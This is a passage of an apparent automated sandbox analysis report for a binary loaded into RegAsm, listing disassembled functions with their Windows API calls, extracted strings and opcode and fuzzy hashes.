                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36, xrefs: 0050CFF8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  • API String ID: 0-1672990099
                                                                                                                                                                                                                                  • Opcode ID: 22ac8b770a0c5b5ade4f012e70590c874fee75a44238219b1bd8116c53655f3c
                                                                                                                                                                                                                                  • Instruction ID: f93c088db4f20a7e8dad6e9c5f3f14d83450d20c26dbc89e4a15c216d380c2bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ac8b770a0c5b5ade4f012e70590c874fee75a44238219b1bd8116c53655f3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F51D3B4E00209ABDB08DFD9D895BEEBBF5BF89304F108119E915A7384D7346A41CF90
                                                                                                                                                                                                                                  Function 00416D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::clear.LIBCPMTD ref: 00416E67
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::ios_base::clear
                                                                                                                                                                                                                                  • String ID: WA$`XA
                                                                                                                                                                                                                                  • API String ID: 1443086396-855112263
                                                                                                                                                                                                                                  • Opcode ID: fd6d3b38f9fdb5634df08d7e797737518ec3e3351e89a693b8f25bb325a5dc12
                                                                                                                                                                                                                                  • Instruction ID: e51bc9c54a42b8ef1cd12b3b9bd65c72ed8b49a9321af47167c83bb76f7294a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd6d3b38f9fdb5634df08d7e797737518ec3e3351e89a693b8f25bb325a5dc12
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2241E874A04209EFDB04CF99C891BAEBBB1FF88304F108199E5456B391C775AE81CF94
                                                                                                                                                                                                                                  Function 0050BD60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 150COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: -1L$-2L
                                                                                                                                                                                                                                  • API String ID: 1452528299-3975959154
                                                                                                                                                                                                                                  • Opcode ID: d906eacbf53bd6ea69bf6e5ba00ac1b5de07542a0e1b8c7bc0926cbd86bdfdf0
                                                                                                                                                                                                                                  • Instruction ID: 70aacba8afa5fca2be74a231ee15d976f3b6a6c99dc4215d1cbc0018f8aaf362
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d906eacbf53bd6ea69bf6e5ba00ac1b5de07542a0e1b8c7bc0926cbd86bdfdf0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B510770E0020DAFDF14DFA9D896AEEBBB1FF48300F108559E505AB390DB74AA45CB94
                                                                                                                                                                                                                                  Function 0041F8A0 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000001), ref: 0041F8D4
                                                                                                                                                                                                                                  • _com_issue_error.COMSUPP ref: 0041F8F2
                                                                                                                                                                                                                                  • _com_issue_error.COMSUPP ref: 0041F91B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _com_issue_error$AllocString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 245909816-0
                                                                                                                                                                                                                                  • Opcode ID: 60f96119b3f1f1225493a60fcb554a1f2a65cb0d002695143f2e4972317d4efb
                                                                                                                                                                                                                                  • Instruction ID: 65e3a0a1e415d60e8b2d00511d3e314293ad63d9ec2b3dcbed55108a80a78f6b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60f96119b3f1f1225493a60fcb554a1f2a65cb0d002695143f2e4972317d4efb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F11D7B4D00208FFDB00EF94C549B9DBBB1EF44304F2081A9E8096B391D779AE89DB85
                                                                                                                                                                                                                                  Function 0055046E Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00550468,00000000,0054BD3A,?,?,7A18E7C2,0054BD3A,?), ref: 0055047F
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00550468,00000000,0054BD3A,?,?,7A18E7C2,0054BD3A,?), ref: 00550486
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00550498
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 1be82f418c8225fefb6aeb59f33d53f3388f4d89d608f9ef7fe15704087c396f
                                                                                                                                                                                                                                  • Instruction ID: aa5f3a27579e3a5c9fed78bbcc659cea81a5e218e8ff5e6d7102a2a3e87ec567
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1be82f418c8225fefb6aeb59f33d53f3388f4d89d608f9ef7fe15704087c396f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58D05E31000108FBCF003F64DC0D86D3F29BF80352B408011FE4947172DB728949EA90
                                                                                                                                                                                                                                  Function 0042C9B0 Relevance: 3.2, APIs: 2, Instructions: 228COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 0042CAD5
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 0042CC48
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$CreateDirectory
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1884557851-0
                                                                                                                                                                                                                                  • Opcode ID: 63c9a8843da7b2b59c2d90ecac6770badc03f6e8931883944bbf89dd0ccdf7d1
                                                                                                                                                                                                                                  • Instruction ID: afeadb30498c5ab13120cd22a2933b3bd008f1ae64185923c6379854b51f491d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63c9a8843da7b2b59c2d90ecac6770badc03f6e8931883944bbf89dd0ccdf7d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5A136B1E002189FDB14CFA9D891BEEBBB5FF88304F1480AAE509A7341DB346A45CF55
                                                                                                                                                                                                                                  Function 0055934B Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00558A61: GetConsoleOutputCP.KERNEL32(7A18E7C2,00000000,00000000,00000000), ref: 00558AC4
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,00589A50,00000014,0054FE94,00000000,00000000,00000000), ref: 005594D0
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 005594DA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2915228174-0
                                                                                                                                                                                                                                  • Opcode ID: 201f97af174688d1bfe5719fbeb33e38c261d8ff65e2259391ef7a08be0b4f04
                                                                                                                                                                                                                                  • Instruction ID: dc8fb06cd764f7ca6f03b1cbbda3dabd1d8fa8bfd74c1d61bf9c8262dcc75208
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 201f97af174688d1bfe5719fbeb33e38c261d8ff65e2259391ef7a08be0b4f04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0619EB180411AEFDF11CFA8C894AEEBFB9BF49305F150546EC04A7252D739D91ADBA0
                                                                                                                                                                                                                                  Function 00413370 Relevance: 3.2, APIs: 2, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                  • Opcode ID: d4c02824f7d2cfb2416021d6dbb8b7306e326f2f7caeeaf32d703e0c6b591cd6
                                                                                                                                                                                                                                  • Instruction ID: d074c9bdc53c2ae6e50ed068fe5b00b2a9db18cb2d959dd177b800b6f206c831
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4c02824f7d2cfb2416021d6dbb8b7306e326f2f7caeeaf32d703e0c6b591cd6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6617275A00109EFCB08CF98C594AEEBBB2BF88305F20819AE915A7355D735AE81DF54
                                                                                                                                                                                                                                  Function 0054BBD1 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,0054BB93,?,?,?,?,?), ref: 0054BC0D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0054BB93,?,?,?,?,?,00589670,00000018,0054BD64,?,?,?,?,?), ref: 0054BC1A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                  • Opcode ID: bcfffc708b122c39ba56ae591e9166d9c0b0d94b574a4d1f27eeb6ad8e47f9c0
                                                                                                                                                                                                                                  • Instruction ID: ef7a8fef63b71a44ed52422d52d87043f3a7a095563021ebdcfa11457343129a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcfffc708b122c39ba56ae591e9166d9c0b0d94b574a4d1f27eeb6ad8e47f9c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68012632610155AFDF058F6ADC49DEE3F29FB95338B240209F841DB190EB71ED419B90
                                                                                                                                                                                                                                  Function 0055B421 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,0055FFB4,0041C3C8,00000000,0041C3C8,?,00560255,0041C3C8,00000007,0041C3C8,?,0056084A,0041C3C8,0041C3C8), ref: 0055B437
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0041C3C8,?,0055FFB4,0041C3C8,00000000,0041C3C8,?,00560255,0041C3C8,00000007,0041C3C8,?,0056084A,0041C3C8,0041C3C8), ref: 0055B442
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                                  • Opcode ID: 6ea4651e377bff4be0b0e1f2cdf3dfd4f67a693199816d5ecf9c0c93f271283d
                                                                                                                                                                                                                                  • Instruction ID: 924246b360743d5adec2253e11b7e0ed1fd4fefad911080028757f78698ee344
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea4651e377bff4be0b0e1f2cdf3dfd4f67a693199816d5ecf9c0c93f271283d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE08632101605EBDF112BA4EC0DBAD3F59BB50395F154061FA08861A1C7708958DBD0
                                                                                                                                                                                                                                  Function 005589C1 Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,CF830579,?,005588A8,00000000,CF830579,00589A30,0000000C,00558964,0054F89D,?), ref: 00558A17
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005588A8,00000000,CF830579,00589A30,0000000C,00558964,0054F89D,?), ref: 00558A21
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                                                  • Opcode ID: ba4073fe59c0273cf0a43eeaadb8b5787e977135eb764b88650cbd609ff65dc6
                                                                                                                                                                                                                                  • Instruction ID: 34048f49f0682552de953bb14b7ec8d2ae5005c56339cee503352dc134d993b2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba4073fe59c0273cf0a43eeaadb8b5787e977135eb764b88650cbd609ff65dc6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 531125336052105EEA255274FC6AB7E3F5A7B82736F29070BED08AB1D1DE609C8C8192
                                                                                                                                                                                                                                  Function 0054F0C5 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d5d8246fbb80c73fa88ba40215bc667caab47cd58235473b3f20f7f2a33f4f39
                                                                                                                                                                                                                                  • Instruction ID: c29b62008b346feeada97876dac7d8e6a4ce1a8194132e313afe00ddb716d566
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5d8246fbb80c73fa88ba40215bc667caab47cd58235473b3f20f7f2a33f4f39
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7651A279A04108AFDF14CF5CCC89AE97FB1BF99318F248169E8499B252D3B19E41CB90
                                                                                                                                                                                                                                  Function 004141F0 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::ios_base::clear.LIBCPMTD ref: 00414372
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::ios_base::clear
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1443086396-0
                                                                                                                                                                                                                                  • Opcode ID: ae5f2f26c0d599025e0ca97d8b441c5013cb85f58257f6b57f861b0c9ea29069
                                                                                                                                                                                                                                  • Instruction ID: 116015eaf527f0b1982685d10685c49746b35df47215dc5781f667e9ddf383d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae5f2f26c0d599025e0ca97d8b441c5013cb85f58257f6b57f861b0c9ea29069
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1151AEB4E04209DFCB04CF99D490AEEFBB1BF88310F24815AE915AB395C734A981CF94
                                                                                                                                                                                                                                  Function 00432D40 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00432E1A
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease$ConditionCurrentDirectoryVariableWake
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 350265564-0
                                                                                                                                                                                                                                  • Opcode ID: 75a9f80101e5d36f66d1d0f72f015ddca4462e52f997d0a212fedcc7cb4ed29f
                                                                                                                                                                                                                                  • Instruction ID: 45b6f63da3570923d1b3c5de4e04317714a7cb2b42decc6fec9e84e6155ee68e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75a9f80101e5d36f66d1d0f72f015ddca4462e52f997d0a212fedcc7cb4ed29f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2521A074D0020DDFCF04DFA5C9859AEBBB1FF89304F14816AE80227355D735A945CBA5
                                                                                                                                                                                                                                  Function 0042DC50 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetUserGeoID.KERNEL32(00000010), ref: 0042DC60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: User
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 765557111-0
                                                                                                                                                                                                                                  • Opcode ID: a6fb5dde44e82a892966d922d239ed6aa50bc4b3ced1092f4f90dd0ec7baa49b
                                                                                                                                                                                                                                  • Instruction ID: 645dd8e041fc49f5174826ac0665943c5158fa6918f172bb6735418e1974a661
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6fb5dde44e82a892966d922d239ed6aa50bc4b3ced1092f4f90dd0ec7baa49b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9811C9B9E40209FFEF00DFE4D846BAEBB74FB88700F104559EA14A7381D6716A00DB95
                                                                                                                                                                                                                                  Function 0041D950 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 0041D967
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                                                                                  • Opcode ID: 4d961e926de3f608138ec2d746d7007bbd1f9dde6943df31f11f7c7b4338fe8d
                                                                                                                                                                                                                                  • Instruction ID: 869ab5568682ad15e99302d89ec85c8ee2891bf7aac97ea4cf070d32e3229af5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d961e926de3f608138ec2d746d7007bbd1f9dde6943df31f11f7c7b4338fe8d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F031F0D1010CABCB04EFA8C48569EFBB5EF44344F1081AAE80597394E2349E81DB85
                                                                                                                                                                                                                                  Function 00506C80 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 00506C9D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                                                                                  • Opcode ID: 73b47f7bd07e15f5c199576c6bc464965e74fbdd8e6b8335aeaa1fce58ab3641
                                                                                                                                                                                                                                  • Instruction ID: 27d6b0f14bdc8df5c149e1c3db57fbdc5afaca3cbefc96f6a2f21912217cf939
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73b47f7bd07e15f5c199576c6bc464965e74fbdd8e6b8335aeaa1fce58ab3641
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55F03CB0C00248EBDF10EFA5C44569DBFB4FB04314F2086AEE865662C1D6799B94CB95
                                                                                                                                                                                                                                  Function 005013C0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 005013DD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                                                                                  • Opcode ID: cb5995437b45c9a39d5c3f3a9a17b3d391dc4d86aa0b610d5a4390aa34024e49
                                                                                                                                                                                                                                  • Instruction ID: e4309a430077ca2301ac788c5d9ed95de07c680818ca4a53bf3ccb11ae0ffce5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb5995437b45c9a39d5c3f3a9a17b3d391dc4d86aa0b610d5a4390aa34024e49
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0E7B0C04249EBCF04EFE5D4456DEBFF4BB54344F1084AED8056B291D379A694CB9A
                                                                                                                                                                                                                                  Function 0055B45B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,0041C3C8,-000A8750,?,0053EE88,0041C3C8,?,0041C3C8,00000000,?,0041A2D6), ref: 0055B48D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 34e944f1193de25cad6c6268fa7f666e1cd852c0fe56dd2940ed258b4c47d558
                                                                                                                                                                                                                                  • Instruction ID: 1c09f8751f9ad0378e2c381b6aa0d22663e0394ab4c576d7e2214ff403ae7fa6
